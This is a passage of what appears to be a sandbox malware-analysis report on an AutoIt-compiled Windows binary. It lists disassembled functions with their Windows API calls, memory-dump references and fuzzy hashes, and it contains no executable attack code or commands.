                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,009477F4,?,?,00000000,00000001), ref: 00949B53
                                                                          • Part of subcall function 00946544: GetWindowRect.USER32(?,?), ref: 00946557
                                                                        • GetDesktopWindow.USER32 ref: 00949B7D
                                                                        • GetWindowRect.USER32(00000000), ref: 00949B84
                                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00949BB6
                                                                          • Part of subcall function 00937A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00937AD0
                                                                        • GetCursorPos.USER32(?), ref: 00949BE2
                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00949C44
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                        • String ID:
                                                                        • API String ID: 4137160315-0
                                                                        • Opcode ID: daabcaf2d8ba89bc321f0b2233d1d1f2ebf60ba9f0ae1c6823dfbe27606abd26
                                                                        • Instruction ID: 97c27b635d170ed5f9c6da364eda807fe33c0e2a6f4871adf0f5f0a95787db8d
                                                                        • Opcode Fuzzy Hash: daabcaf2d8ba89bc321f0b2233d1d1f2ebf60ba9f0ae1c6823dfbe27606abd26
                                                                        • Instruction Fuzzy Hash: 7131BCB2108309ABD720DF549849F9BB7EDFF89314F00091AF589E7181DA31EA44CB92
                                                                        APIs
                                                                          • Part of subcall function 0090AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0090AFE3
                                                                          • Part of subcall function 0090AF83: SelectObject.GDI32(?,00000000), ref: 0090AFF2
                                                                          • Part of subcall function 0090AF83: BeginPath.GDI32(?), ref: 0090B009
                                                                          • Part of subcall function 0090AF83: SelectObject.GDI32(?,00000000), ref: 0090B033
                                                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 0095EC20
                                                                        • LineTo.GDI32(00000000,00000003,?), ref: 0095EC34
                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 0095EC42
                                                                        • LineTo.GDI32(00000000,00000000,?), ref: 0095EC52
                                                                        • EndPath.GDI32(00000000), ref: 0095EC62
                                                                        • StrokePath.GDI32(00000000), ref: 0095EC72
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                        • String ID:
                                                                        • API String ID: 43455801-0
                                                                        • Opcode ID: aa75c3b10307ed6954c40f31ac1ea8afb66fdc1df72699b92d23751e43a1b99a
                                                                        • Instruction ID: e1d09cbd40b33ac56b68a1c0d4e868564248a3fdf0ca63464024918b6c4ea4ae
                                                                        • Opcode Fuzzy Hash: aa75c3b10307ed6954c40f31ac1ea8afb66fdc1df72699b92d23751e43a1b99a
                                                                        • Instruction Fuzzy Hash: DC110972005149BFEB029F90DD88FEA7F6DEF08360F048112BE0889160D7719E95EBA0
                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 0092E1C0
                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 0092E1D1
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0092E1D8
                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 0092E1E0
                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0092E1F7
                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 0092E209
                                                                          • Part of subcall function 00929AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,00929A05,00000000,00000000,?,00929DDB), ref: 0092A53A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CapsDevice$ExceptionRaiseRelease
                                                                        • String ID:
                                                                        • API String ID: 603618608-0
                                                                        • Opcode ID: 9f20f0bb10379990551dcab94d0ddff5ad65cdf6e58e5945d0c9ea38a54e58d4
                                                                        • Instruction ID: be18849777e49270c4c826744f01c1692028a25320b3e55f00bac700708af7bd
                                                                        • Opcode Fuzzy Hash: 9f20f0bb10379990551dcab94d0ddff5ad65cdf6e58e5945d0c9ea38a54e58d4
                                                                        • Instruction Fuzzy Hash: 5B018FB6A04314BFEB109BA69C45F5EBFB8EF48351F004066EA08A7391DA719C00CBA0
                                                                        APIs
                                                                        • __init_pointers.LIBCMT ref: 00917B47
                                                                          • Part of subcall function 0091123A: __initp_misc_winsig.LIBCMT ref: 0091125E
                                                                          • Part of subcall function 0091123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00917F51
                                                                          • Part of subcall function 0091123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00917F65
                                                                          • Part of subcall function 0091123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00917F78
                                                                          • Part of subcall function 0091123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00917F8B
                                                                          • Part of subcall function 0091123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00917F9E
                                                                          • Part of subcall function 0091123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00917FB1
                                                                          • Part of subcall function 0091123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00917FC4
                                                                          • Part of subcall function 0091123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00917FD7
                                                                          • Part of subcall function 0091123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00917FEA
                                                                          • Part of subcall function 0091123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00917FFD
                                                                          • Part of subcall function 0091123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00918010
                                                                          • Part of subcall function 0091123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00918023
                                                                          • Part of subcall function 0091123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00918036
                                                                          • Part of subcall function 0091123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00918049
                                                                          • Part of subcall function 0091123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 0091805C
                                                                          • Part of subcall function 0091123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 0091806F
                                                                        • __mtinitlocks.LIBCMT ref: 00917B4C
                                                                          • Part of subcall function 00917E23: InitializeCriticalSectionAndSpinCount.KERNEL32(009AAC68,00000FA0,?,?,00917B51,00915E77,009A6C70,00000014), ref: 00917E41
                                                                        • __mtterm.LIBCMT ref: 00917B55
                                                                          • Part of subcall function 00917BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00917B5A,00915E77,009A6C70,00000014), ref: 00917D3F
                                                                          • Part of subcall function 00917BBD: _free.LIBCMT ref: 00917D46
                                                                          • Part of subcall function 00917BBD: DeleteCriticalSection.KERNEL32(009AAC68,?,?,00917B5A,00915E77,009A6C70,00000014), ref: 00917D68
                                                                        • __calloc_crt.LIBCMT ref: 00917B7A
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00917BA3
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                        • String ID:
                                                                        • API String ID: 2942034483-0
                                                                        • Opcode ID: 9bc2e26d9778d2f8434386066c0defa742937a33c81cd62aa9c371795c6fedcb
                                                                        • Instruction ID: 121ba200ad40f73c0e3a97b22eae91ff1b43a7fb860c2d27ed9eaeed4d305e50
                                                                        • Opcode Fuzzy Hash: 9bc2e26d9778d2f8434386066c0defa742937a33c81cd62aa9c371795c6fedcb
                                                                        • Instruction Fuzzy Hash: 22F0963275D31B1AE62477F47C067CAA6F89F82734B2046A9F864C60E1FF2588C181A1
                                                                        APIs
                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 008F281D
                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 008F2825
                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 008F2830
                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 008F283B
                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 008F2843
                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 008F284B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Virtual
                                                                        • String ID:
                                                                        • API String ID: 4278518827-0
                                                                        • Opcode ID: 745cfc0459ca67293f12df35c1329b22dca492100cb72c48344e72129a9f1333
                                                                        • Instruction ID: 69a5b22dff1777c3cdda3331829ff9fd8f23b70fe5f1ffea40167ec62d5af65b
                                                                        • Opcode Fuzzy Hash: 745cfc0459ca67293f12df35c1329b22dca492100cb72c48344e72129a9f1333
                                                                        • Instruction Fuzzy Hash: 930167B1902B5ABDE3008F6A8C85B52FFB8FF59354F00411BA15C47A42C7F5A864CBE5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                        • String ID:
                                                                        • API String ID: 1423608774-0
                                                                        • Opcode ID: 995a7d63e21588dada9794e0879b9c4691703df8d71406a51f4dabd8fbd4faa3
                                                                        • Instruction ID: 4e187dbd30a0234827440d8bb6c18bc9fd5ac0ea3bad3b0a480a030373e81bf3
                                                                        • Opcode Fuzzy Hash: 995a7d63e21588dada9794e0879b9c4691703df8d71406a51f4dabd8fbd4faa3
                                                                        • Instruction Fuzzy Hash: 38018133116211ABDB152B94ED48FEB7779FF88701B040569F507E24A1DBB49841EF60
                                                                        APIs
                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00937C07
                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00937C1D
                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 00937C2C
                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00937C3B
                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00937C45
                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00937C4C
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                        • String ID:
                                                                        • API String ID: 839392675-0
                                                                        • Opcode ID: 217ef8f8f8dd6b108e8ada9332a216236e117c016b3a961f856c6609b9177a80
                                                                        • Instruction ID: 7ce577674556a9845f5d93933e3e7b67f532bd7f6250975bf71095443fdb332c
                                                                        • Opcode Fuzzy Hash: 217ef8f8f8dd6b108e8ada9332a216236e117c016b3a961f856c6609b9177a80
                                                                        • Instruction Fuzzy Hash: 08F03A73256158BBE7215B929C0EEEF7B7CEFC6B15F000028FA0991051E7A05A81E6B5
                                                                        APIs
                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 00939A33
                                                                        • EnterCriticalSection.KERNEL32(?,?,?,?,00965DEE,?,?,?,?,?,008FED63), ref: 00939A44
                                                                        • TerminateThread.KERNEL32(?,000001F6,?,?,?,00965DEE,?,?,?,?,?,008FED63), ref: 00939A51
                                                                        • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00965DEE,?,?,?,?,?,008FED63), ref: 00939A5E
                                                                          • Part of subcall function 009393D1: CloseHandle.KERNEL32(?,?,00939A6B,?,?,?,00965DEE,?,?,?,?,?,008FED63), ref: 009393DB
                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 00939A71
                                                                        • LeaveCriticalSection.KERNEL32(?,?,?,?,00965DEE,?,?,?,?,?,008FED63), ref: 00939A78
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                        • String ID:
                                                                        • API String ID: 3495660284-0
                                                                        • Opcode ID: 1ab715d98f3e95113562afad568fb7899b9b5742c3c6d399ee92a8b8e14e092e
                                                                        • Instruction ID: a9a71bf5041d8d92f4a6390efbd52d443483a644c8c3192ee3bda4bffb050711
                                                                        • Opcode Fuzzy Hash: 1ab715d98f3e95113562afad568fb7899b9b5742c3c6d399ee92a8b8e14e092e
                                                                        • Instruction Fuzzy Hash: 37F0823315A211ABD7112BA4EC8DEEB7739FF84301F140565F507A50B5DBB59842EF60
                                                                        APIs
                                                                          • Part of subcall function 0090F4EA: std::exception::exception.LIBCMT ref: 0090F51E
                                                                          • Part of subcall function 0090F4EA: __CxxThrowException@8.LIBCMT ref: 0090F533
                                                                        • __swprintf.LIBCMT ref: 008F1EA6
                                                                        Strings
                                                                        • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 008F1D49
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Exception@8Throw__swprintfstd::exception::exception
                                                                        • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                        • API String ID: 2125237772-557222456
                                                                        • Opcode ID: 58cb71600b093d8e324dc26c1e9112f489bedc6a2b4997e12e295512d66b1748
                                                                        • Instruction ID: 05e430eb24542ce4a79f6e79addd06da5542bc5da114d8e54b41a3e2ae14f301
                                                                        • Opcode Fuzzy Hash: 58cb71600b093d8e324dc26c1e9112f489bedc6a2b4997e12e295512d66b1748
                                                                        • Instruction Fuzzy Hash: 08914E716082099FCB24EF28C895D7AB7A4FF95700F10491DFA96D72A1DB70ED44CB92
                                                                        APIs
                                                                        • VariantInit.OLEAUT32(?), ref: 0094B006
                                                                        • CharUpperBuffW.USER32(?,?), ref: 0094B115
                                                                        • VariantClear.OLEAUT32(?), ref: 0094B298
                                                                          • Part of subcall function 00939DC5: VariantInit.OLEAUT32(00000000), ref: 00939E05
                                                                          • Part of subcall function 00939DC5: VariantCopy.OLEAUT32(?,?), ref: 00939E0E
                                                                          • Part of subcall function 00939DC5: VariantClear.OLEAUT32(?), ref: 00939E1A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                        • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                        • API String ID: 4237274167-1221869570
                                                                        • Opcode ID: 9d0a1cdcb916cd05dbac0ffa4f341b9c49c5ee1dc20c0abc1b366b1b79241e35
                                                                        • Instruction ID: 173370396f4cf7c803e50308ad6ee0e74a4c1fea74b4dbad76de5fc6cb43d1d5
                                                                        • Opcode Fuzzy Hash: 9d0a1cdcb916cd05dbac0ffa4f341b9c49c5ee1dc20c0abc1b366b1b79241e35
                                                                        • Instruction Fuzzy Hash: 719158746083059FCB10DF28C495E6ABBE8FF89704F04486DF99A9B3A1DB31E945CB52
                                                                        APIs
                                                                          • Part of subcall function 0090C6F4: _wcscpy.LIBCMT ref: 0090C717
                                                                        • _memset.LIBCMT ref: 00935438
                                                                        • GetMenuItemInfoW.USER32(?), ref: 00935467
                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00935513
                                                                        • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 0093553D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                        • String ID: 0
                                                                        • API String ID: 4152858687-4108050209
                                                                        • Opcode ID: 0156530dbb96bd25b057c9527071de01f6000934ea21e7828beee46682bde489
                                                                        • Instruction ID: 5176a0b23f12352aa1e667696ac3aac48b73c589d85f4fafed898d4f6a751b9c
                                                                        • Opcode Fuzzy Hash: 0156530dbb96bd25b057c9527071de01f6000934ea21e7828beee46682bde489
                                                                        • Instruction Fuzzy Hash: D35104726187019BD7149B28C8857BBB7ECEF89360F160A2EF896D31A1DB60DD448F52
                                                                        APIs
                                                                        • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0093027B
                                                                        • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 009302B1
                                                                        • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 009302C2
                                                                        • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00930344
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$AddressCreateInstanceProc
                                                                        • String ID: DllGetClassObject
                                                                        • API String ID: 753597075-1075368562
                                                                        • Opcode ID: 61597e49cdc4e4fd6922388f0a9f02096e349cbea7933dc86ac33e3bb8b7ada3
                                                                        • Instruction ID: 7f4f862206d0985de006105db6643161b833a9b6ddb5ca9953c6cb4d507276ff
                                                                        • Opcode Fuzzy Hash: 61597e49cdc4e4fd6922388f0a9f02096e349cbea7933dc86ac33e3bb8b7ada3
                                                                        • Instruction Fuzzy Hash: 42417C72605204EFDB05CF54C8A4B9A7BB9EF84314F1480A9E909DF206D7B5DA44CFA1
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00935075
                                                                        • GetMenuItemInfoW.USER32 ref: 00935091
                                                                        • DeleteMenu.USER32(00000004,00000007,00000000), ref: 009350D7
                                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,009B1708,00000000), ref: 00935120
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287765444.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287785345.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_8f0000_A2028041200SD.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Delete$InfoItem_memset
                                                                        • String ID: 0
                                                                        • API String ID: 1173514356-4108050209
                                                                        • Opcode ID: 2b105174466d3d24378aed1e5989e488f96edfa4765b52dab1991feb0a7ac920
                                                                        • Instruction ID: caec33f5946eece606cf69c2f52a8de67911ef595918b45289aa931aad0ff560
                                                                        • Opcode Fuzzy Hash: 2b105174466d3d24378aed1e5989e488f96edfa4765b52dab1991feb0a7ac920
                                                                        • Instruction Fuzzy Hash: 1E41D0712097019FD720DF68D880B6BB7E8BF89324F154A1EF99997291D730E940CF62
                                                                        APIs
                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 0093E742
                                                                        • GetLastError.KERNEL32(?,00000000), ref: 0093E768
                                                                        • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 0093E78D
                                                                        • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 0093E7B9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1287655669.00000000008F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008F0000, based on PE: true
                                                                        • Associated: 00000000.00000002.1287639553.00000000008F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000097D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1287713878.000000000099E000.00000002.00000001.01000000.00000003.sdmpDownload File
